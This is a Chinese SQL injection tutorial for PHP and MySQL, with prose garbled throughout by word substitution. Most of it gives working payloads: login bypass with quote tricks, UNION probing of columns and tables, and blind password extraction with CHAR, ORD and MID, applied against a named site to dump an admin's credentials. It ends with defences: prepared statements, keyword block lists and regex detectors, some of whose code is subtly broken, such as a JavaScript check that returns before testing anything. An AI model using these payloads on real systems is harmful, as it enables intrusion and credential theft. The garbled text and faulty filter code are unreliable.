一、SQL注入攻击的事理

SQL注入攻击指的是通过构建分外的输入作为参数传入Web运用程序,而这些输入大都是SQL语法里的一些组合,通过实行SQL语句进而实行攻击者所要的操作,其紧张缘故原由是程序没有细致地过滤用户输入的数据,致使造孽数据侵入系统。
根据干系技能事理,SQL注入可以分为平台层注入和代码层注入。
前者由不屈安的数据库配置或数据库平台的漏洞所致;后者紧张是由于程序员对输入未进行细致地过滤,从而实行了造孽的数据查询。
基于此,SQL注入的产生缘故原由常日表现在以下几方面:①不当的类型处理;②不屈安的库配置;③不合理的查询集处理;④不当的缺点处理;⑤转义字符处理不得当;⑥多个提交处理不当

二、SQL注入攻击的总体思路

jsp中输入正则表达式实例菜鸟黑客必学进击之SQL注入进击 AJAX

1.探求到SQL注入的位置

2.判断做事器类型和后台数据库类型

3.针对不通的做事器和数据库特点进行SQL注入攻击

三、常用SQL注入工具

关于SQL注入,目前已经有工具软件支持,如WebCruiser - Web Vulnerability Scanner (Web安全漏洞扫描工具,可以扫描出网站存在SQL注入、跨站脚本攻击、XPath注入的页面,并且可以进一步进行SQL注入验证、跨站攻击验证、XPath注入验证 ),这个工具在很多网站上都有详细利用方法,在这里我不多做解释。

四、本日讲一讲\"大众PHP+MYSQL注入\"大众

1、通过一个例子,理解PHP下的注入的分外性和事理。

我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:

CREATETABLE`user`(

`userid`int(11)NOTNULLauto_increment,

`username`varchar(20)NOTNULLdefault'',

`password`varchar(20)NOTNULLdefault'',

PRIMARYKEY(`userid`)

)TYPE=MyISAMAUTO_INCREMENT=3;

#

#导出表中的数据`user`

#

INSERTINTO`user`VALUES(1,'angel','mypass');

验证用户文件的代码如下:

<?php

$servername=\公众localhost\"大众;

$dbusername=\公众root\公众;

$dbpassword=\"大众\"大众;

$dbname=\公众injection\"大众;

mysql_connect($servername,$dbusername,$dbpassword)ordie(\公众数据库连接失落败\公众);

$sql=\公众SELECTFROMuserWHEREusername='$username'ANDpassword='$password'\"大众;

$result=mysql_db_query($dbname,$sql);

$userinfo=mysql_fetch_array($result);

if(empty($userinfo))

{

echo\"大众上岸失落败\"大众;

}else{

echo\"大众上岸成功\公众;

}

echo\"大众

SQLQuerysql

\"大众;

?>

这时我们提交:

http://127.0.0.1/injection/user.php?username=angel'or1=1

就会返回:

Warning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresultresource

inF:wwwinjectionuser.phponline13

上岸失落败

SQLQuery:SELECTFROMuserWHEREusername='angel'or1=1'ANDpassword=''PHPWarning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresult

resourceinF:wwwinjectionuser.phponline13

看到了吗?单引号闭合后,并没有注释掉后面的单引号,导致单引号没有精确配对,以是由此可知我们布局的语句不能让Mysql精确实行,要重新布局:

http://127.0.0.1/injection/user.php?username=angel'or'1=1

这时显示\"大众上岸成功\公众,解释成功了。
或者提交:

http://127.0.0.1/injection/user.php?username=angel'/

http://127.0.0.1/injection/user.php?username=angel'%23

这样就把后面的语句给注释掉了!
说说这两种提交的不同之处,我们提交的第一句是利用逻辑运算,在ASP中利用可以说是非常广泛的,这个不用说了吧?第二、三句是根据mysql的特性,mysql支持/和#两种注释格式,以是我们提交的时候是把后面的代码注释掉,值得把稳的是由于编码问题,在IE地址栏里提交#会变成空的,以是我们在地址栏提交的时候,该当提交%23,才会变成#,就成功注释了,这个比逻辑运算大略得多了,由此可以看出PHP比ASP强大灵巧多了。
通过上面的例子大家该当对PHP+MYSQL的注入有个根本的认识了吧?

2、注入的高等运用

2.1 利用MYSQL内置函数

我们在ACCESS、MSSQL中的注入,有很多比较高等的注入方法,比如深入到系统,猜中文等,这些东西,在MYSQL也能很好得到发挥,其实在MYSQL有很多内置函数都可以用在SQL语句里,这样就可以使我们能在注入时更灵巧,得到更多关于系统的信息。
有几个函数是比较常用的:

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

……

各个函数的详细浸染大家可以查阅MYSQL手册,比如下面这句UPDATE:

UPDATE article SET title=$title WHERE articleid=1

我们可以指定$title为以上的各个函数,由于没有被引号包含,以是函数是能精确实行的:

UPDATE article SET title=DATABASE() WHERE id=1

#把当前数据库名更新到title字段

UPDATE article SET title=USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=SYSTEM_USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=SESSION_USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=CURRENT_USER() WHERE id=1

#把当前会话被验证匹配的用户名更新到title字段

灵巧利用MYSQL内置的函数,可以得到不少有用的信息,比如数据库版本、名字、用户、当前数据库等,比如前面跨表查询的例子,提交:

http://127.0.0.1/injection/show.php?id=1

可以看到一篇文章,我们怎么样才能知道MYSQL数据库的干系信息呢?同样也是用MYSQL内置函数合营UNION联合查询,不过比较之下就大略得多了,乃至还可以读取文件!
既然要用到UNION,同样要知足UNION的条件--字段数、数据类型相同。
如果我们知道了数据构造,直接布局:

http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

就可以返回当前数据库名和数据库版本,布局是比较随意马虎的。

下面附上一段代码,可以把字符串转换为ASCII代码。
#!/usr/bin/perl

#cody by Super·Hei

#to angel

#C:>test.pl c:boot.ini

#99,58,92,98,111,111,116,46,105,110,105

$ARGC = @ARGV;

if ($ARGC != 1) {

print \公众Usage: $0 n\"大众;

exit(1);

}

$path=shift;

@char = unpack('C', $path);

$asc=join(\公众,\"大众,@char);

print $asc;

2.2不加单引号注入

注:现在我们假设magic_quotes_gpc为on了。

众所周知,整形的数据是不须要用引号引起来的,而字符串就要用引号,这样可以避免很多问题。
但是如果仅仅用整形数据,我们是没有办法注入的,以是我须要把我们布局的语句转换成整形类型,这个就须要用到CHAR(),ASCII(),ORD(),CONV()这些函数了,举个大略的例子:

SELECT FROM user WHERE username='angel'

如何使$username不带引号呢?很大略我们这样提交就可以了。

SELECT FROM user WHERE user name=char(97,110,103,101,108)

# char(97,110,103,101,108) 相称于angel,十进制。

SELECT FROM user WHERE username=0x616E67656C

# 0x616E67656C 相称于angel,十六进制。

其他函数大家自己去测试好了,但是条件就如上面所说的,我们可以布局的变量不被引号所包含才故意义,不然我们不管布局什么,只是字符串,发挥不了浸染,比如前面猜密码的例子(user,php),我们把查询条件改为userid:

SELECT FROM user WHERE userid=userid

按照正常的,提交:

http://127.0.0.1/injection/user.php?userid=1

就可以查询userid为1的用户资料,由于1是数字,以是有没有引号都无所谓,但是如果我们布局:

http://127.0.0.1/injection/user.php?userid=1 and password=mypass

绝对缺点,由于mypass是字符串,除非提交:

http://127.0.0.1/injection/user.php?userid=1 and password='mypass'

由于magic_quotes_gpc打开的关系,这个是绝对不可能的。
引号会变成/',我们有什么办法可以把这些字符串变成整形数据吗?便是用CHAR()函数,如果我们提交:

http://127.0.0.1/injection/user.php?userid=1 and password=char

(109,121,112,97,115,115)

正常返回,实践证明,我们用CHAR()是可行的,我们就把CHAR()用进LEFT函数里面逐位猜解!

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109)

正常返回,解释userid为1的用户,password字段第一位是char(109),我们连续猜:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121)

又正常返回,解释精确,但这样影响到效率,既然是整形,我们完备可以用比较运算符来比较:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

然后适当调度char()里面的数字来确定一个范围,很快就可以猜出来,到了后面的时候,还是可以用比较运算符来比较:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111)

而原来已经猜好的不用改变了,很快就可以猜完:

http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char

(109,121,112,97,115,115)

然后在mysql>命令提示符下或者在phpMyadmin里面实行:

select char(109,121,112,97,115,115)

就会返回:mypass

当然也可以利用SUBSTRING(str,pos,len)和MID(str,pos,len)函数,从字符串 str 的 pos 位置起返回 len 个字符的子串。
这个和ACCESS是一样的。
还是刚才的例子,我们猜password字段的第三位、第四位试试,第三位是p,第四位是a,我们这样布局:

http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112)

http://127.0.0.1/injection/user.php?userid=1 and mid(password,4,1)=char(97)

我们要的结果就迸出来了。
当然,如果以为麻烦,还可以用更大略的办法,便是利用ord()函数,详细浸染可以去查看MYSQL参考手册,该函数返回的是整形类型的数据,可以用比较运算符进行比较、当然得出的结果也就快多了,也便是这样提交:

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))<113

http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))=112

这样我们就得出结果了,然后我们再用char()函数还原出来就好了。
至于其他更多函数,大家可以自己去试验,限于篇幅也不多说了。

2.3快速确定未知数据构造的字段及类型

如果不清楚数据构造,很难用UNION联合查询,这里我见告大家一个小技巧,也是非常有用非常必要的技巧,充分发挥UNION的特性。

还是拿前面的show.php文件做例子,当我们看到形如xxx.php?id=xxx的URL的时候,如果要UNION,就要知道这个xxx.php查询的数据表的构造,我们可以这样提交来快速确定有多少个字段:

http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

有多少个\"大众1\"大众就表示有多少个字段,可以逐步试,如果字段数不相同,就肯定会出错,如果字段数猜对了,就肯定会返回精确的页面,字段数出来了,就开始判断数据类型,实在也很随意马虎,随便用几个字母代替上面的1,但是由于magic_quotes_gpc打开,我们不能用引号,老办法,还是用char()函数,char(97)表示字母\"大众a\"大众,如下:

http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

如果是字符串,那就会正常显示\"大众a\"大众,如果不是字符串或文本,也便是说是整形或布尔形,就会返回\公众0\"大众

判断最紧张靠什么?履历,我以前一贯都说,履历很主要,丰富履历能更好的作出精确的判断,由于程序的代码是千变万化的,我们这里是只是举个最大略的例子,这里由于局限性,程序都是自己写、自己测试的。
方法因程序而异。
希望大家在实战中,把稳差异,不要照搬,灵巧利用才是根本。

2.4猜数据表名

在快速确定未知数据构造的字段及类型的根本上,我们又可以进一步的剖析全体数据构造,那便是猜表名,实在利用UNION联合查询的时候,不管后面的查询怎么\公众畸形\公众,只要没有语句上的问题,都会精确返回,也便是说,我们可以在上面的根本上,进一步猜到表名了,比如刚才我们提交:

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1

返回正常的内容,就解释这个文件查询的表内是存在3个字段的,然后我们在后面加入from table_name,也便是这样:

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from admin

http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from user

如果这个表是存在的,那么同样会返回该当显示的内容,如果表不存在,当然就会出错了,以是我的思路是先得到有漏洞的文件所查询表的数据构造,确定结果后再进一步查询表,这个手工操作是没有效率的问题的,不到一分钟就可以查询到了,比如我们在测试www.bai.net便是这样,后面的实例会涉及到。

但是有一个问题,由于很多情形下,很多程序的数据表都会有一个前缀,有这个前缀就可以让多个程序共用一个数据库。
比如:

site_article

site_user

site_download

forum_user

forum_post

……

如果安全意识高的话,管理员会加个表名前缀,那猜解就很麻烦了,不过完备可以做一个表名列表来跑。
这里就不多说了,接下来举一个实际例子。

3、测试实例

以下实例内容只是为了验证上述讲解内容,针对一个测试站点进积善意的攻击测试,我们称这个测试站点为HB(www.bai.net),该站点是文章系统和下载系统,首先须要利用技能渗透HB,这点我之前的文章有说过找到漏洞是攻击的条件。

首先我们找到有问题的文件,show.php?id=1,我们立时看看数据构造和表名,看看HB有没有改字段和表名,创造该站点下载系统1.0.1版的软件信息的表有19个字段,就提交:

http://127.0.0.1/ymdown/show.php?id=1 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

把稳,这里有19个\"大众1\"大众,返回正常的页面,我可以可以肯定字段没有变,我们也就别拖沓了,直接看看它的默认用户数据表是否存在:

http://127.0.0.1/ymdown/show.php?id=1 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

再看默认的用户id还在不在?

http://127.0.0.1/ymdown/show.php?id=1 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

我们要把稳一点,show.php文件里面有这样一段代码:

if ($id > \公众0\"大众 && $id < \公众999999999\公众 ):

//这里是精确实行的代码

else:

echo \"大众

<center><a href=./list.php>无记录</a>n\"大众;

也便是说我们的ID的值再怎么离谱也不能在0和999999999之外,HB的软件肯定不会超过10000个的,我们就提交:

http://127.0.0.1/ymdown/show.php?id=10000 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

正常返回了,表格里的数据全部是\公众1\"大众,解释ID还在哦。
如果不存在的话,页面只返回的数据全部是不详,由于程序的判断是如果数据为空就显示不详。
现在确定了ID存在后,还要确定是不是管理员才行啊:

http://127.0.0.1/ymdown/show.php?id=10000 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

程序规定groupid为1是超级管理员,既然都返回精确信息了,我们就直接布局畸形语句,暴出我们须要的用户名和密码,嘿嘿,首先看看ymdown表的数据构造,由于show.php是查询它的,以是我们该当看它的数据构造。

CREATE TABLE ymdown (

id int(10) unsigned NOT NULL auto_increment,

name varchar(100) NOT NULL,

updatetime varchar(20) NOT NULL,

size varchar(100) NOT NULL,

empower varchar(100) NOT NULL,

os varchar(100) NOT NULL,

grade smallint(6) DEFAULT '0' NOT NULL,

viewnum int(10) DEFAULT '0' NOT NULL,

downnum int(10) DEFAULT '0' NOT NULL,

homepage varchar(100), demo varchar(100),

brief mediumtext, img varchar(100),

sort2id smallint(6) DEFAULT '0' NOT NULL,

down1 varchar(100) NOT NULL,

down2 varchar(100),

down3 varchar(100),

down4 varchar(100),

down5 varchar(100),

PRIMARY KEY (id)

);

用户名和密码的数据类型都是varchar,以是我们要选择ymdown表里数据类型是varchar来,如果把varchar的数据写到int的地方当然是不可能显示的了,由于updatetime(更新日期)的长度是20,可能会涌现显示不完备的情形,我们就把用户名显示在name(软件标题)那里,密码显示在size(文件大小)那里好了,在19个\公众1\"大众中,name和size分别是第二个和第四个,我们提交:

http://127.0.0.1/ymdown/show.php?id=10000 union select

1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

结果成功返回了我们所须要的用户名和密码验证测试结果

全体渗透过程就结束了,不过由于黑白把入口给改了,无法上岸,但我们仅仅测试注入,目的已经达到了,就没有必要进后台了,我后来又连续布局SQL语句来验证我们获取的密码是否精确,依次提交:

http://127.0.0.1/ymdown/show.php?id=10 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

#验证第一位密码

http://127.0.0.1/ymdown/show.php?id=10 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50

#验证第二位密码

http://127.0.0.1/ymdown/show.php?id=10 union select

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

#验证第三位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,4,1))=52

#验证第四位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,5,1))=53

#验证第五位密码

http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,6,1))=54

#验证第六位密码

用select char(49,50,51,52,53,54)就可以得到123456。

OK!
测试结束,验证我们的结果没有缺点。
解释一下,密码本身是123456,可以不用ord()函数而直接猜,但为了大家能看到一个完全的过程,还是\"大众专业\公众一点好了。

五、SQL注入如何戒备?

1、(大略又有效的方法)PreparedStatement

采取预编译语句集,它内置了处理SQL注入的能力,只要利用它的setXXX方法传值即可。
利用好处:

(1).代码的可读性和可掩护性.

(2).PreparedStatement尽最大可能提高性能.

(3).最主要的一点是极大地提高了安全性.

事理:

sql注入只对sql语句的准备(编译)过程有毁坏浸染

而PreparedStatement已经准备好了,实行阶段只是把输入串作为数据处理,

而不再对sql语句进行解析,准备,因此也就避免了sql注入问题.

2、字符串过滤

比较通用的一个方法:

(||之间的参数可以根据自己程序的须要添加)

public static boolean sql_inj(String str)

{

String inj_str = \"大众'|and|exec|insert|select|delete|update|

count||%|chr|mid|master|truncate|char|declare|;|or|-|+|,\"大众;

String inj_stra[] = split(inj_str,\公众|\公众);

for (int i=0 ; i < inj_stra.length ; i++ )

{

if (str.indexOf(inj_stra[i])>=0)

{

return true;

}

}

return false;

}

3、利用正则表达式过滤传入的参数

要引入的包:

import java.util.regex.;

正则表达式:

private String CHECKSQL = \公众^(.+)\\sand\\s(.+)|(.+)\\sor(.+)\\s$\公众;

判断是否匹配:

Pattern.matches(CHECKSQL,targerStr);

下面是详细的正则表达式:

检测SQL meta-characters的正则表达式 :

/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix

改动检测SQL meta-characters的正则表达式 :/((\%3D)|(=))[^\n]((\%27)|(\')|(\-\-)|(\%3B)|(:))/i

范例的SQL 注入攻击的正则表达式 :/\w((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

检测SQL注入,UNION查询关键字的正则表达式 :/((\%27)|(\'))union/ix(\%27)|(\')

检测MS SQL Server SQL注入攻击的正则表达式:

/exec(\s|\+)+(s|x)p\w+/ix

4、JSP页面判断代码:

利用javascript在客户端进行不屈安字符屏蔽

功能先容:检讨是否含有\公众'\"大众,\公众\\\公众,\公众/\"大众

参数解释:要检讨的字符串

返回值:0:是1:不是

函数名是

function check(a)

{

return 1;

fibdn = new Array (\"大众'\"大众 ,\"大众\\\"大众,\公众/\公众);

i=fibdn.length;

j=a.length;

for (ii=0; ii<i; ii++)

{ for (jj=0; jj<j; jj++)

{ temp1=a.charAt(jj);

temp2=fibdn[ii];

if (tem'; p1==temp2)

{ return 0; }

}

}

return 1;

}

5、jsp中调用该函数检讨是否包函造孽字符

防止SQL从URL注入:

sql_inj.java代码:

package sql_inj;

import java.net.;

import java.io.;

import java.sql.;

import java.text.;

import java.lang.String;

public class sql_inj{

public static boolean sql_inj(String str)

{

String inj_str = \公众'|and|exec|insert|select|delete|update|

count||%|chr|mid|master|truncate|char|declare|;|or|-|+|,\公众;

//这里的东西还可以自己添加

String[] inj_stra=inj_str.split(\"大众\\|\"大众);

for (int i=0 ; i < inj_stra.length ; i++ )

{

if (str.indexOf(inj_stra[i])>=0)

{

return true;

}

}

return false;

}

}